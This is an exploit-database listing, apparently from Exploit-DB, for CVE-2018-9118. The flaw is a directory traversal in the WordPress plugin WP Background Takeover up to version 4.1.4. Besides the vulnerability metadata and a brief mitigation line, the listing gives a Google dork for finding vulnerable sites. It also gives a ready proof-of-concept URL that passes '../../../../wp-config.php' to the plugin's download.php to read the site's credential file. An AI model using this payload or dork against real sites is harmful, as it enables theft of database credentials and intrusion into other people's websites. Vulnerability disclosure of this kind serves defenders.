header-logo
Suggest Exploit
vendor:
WP Background Takeover
by:
Colette Chamberland, Defiant, Inc.
7.5
CVSS
HIGH
Directory Traversal
22
CWE
Product Name: WP Background Takeover
Affected Version From: <= 4.1.4
Affected Version To: <= 4.1.4
Patch Exists: YES
Related CWE: CVE-2018-9118
CPE: 2.3:a:99robots:wp_background_takeover:4.1.4
Metasploit: N/A
Other Scripts: N/A
Platforms Tested: Wordpress 4.9.x
2018

WP Background Takeover, Directory Traversal <= 4.1.4

Allows for an attacker to browse files via the download.php file: http://target[.]com/wp-content/plugins/wpsite-background-takeover/exports/download.php?filename=../../../../wp-config.php

Mitigation:

Ensure that the download.php file is not accessible to attackers.
Source

Exploit-DB raw data:

# Exploit Title: WP Background Takeover, Directory Traversal <= 4.1.4
# Google Dork: inurl:/plugins/wpsite-background-takeover
# Date: 2018-03-08
# Exploit Author: Colette Chamberland, Defiant, Inc.
# Vendor Homepage: https://99robots.com
# Software Link: https://99robots.com/products/wp-background-takeover-advertisements/
# Version: <= 4.1.4
# Tested on: Wordpress 4.9.x
# CVE : CVE-2018-9118

Description

Allows for an attacker to browse files via the download.php file:

http://target[.]com/wp-content/plugins/wpsite-background-takeover/exports/download.php?filename=../../../../wp-config.php

Navigation

Suggest Exploit

Services By CQR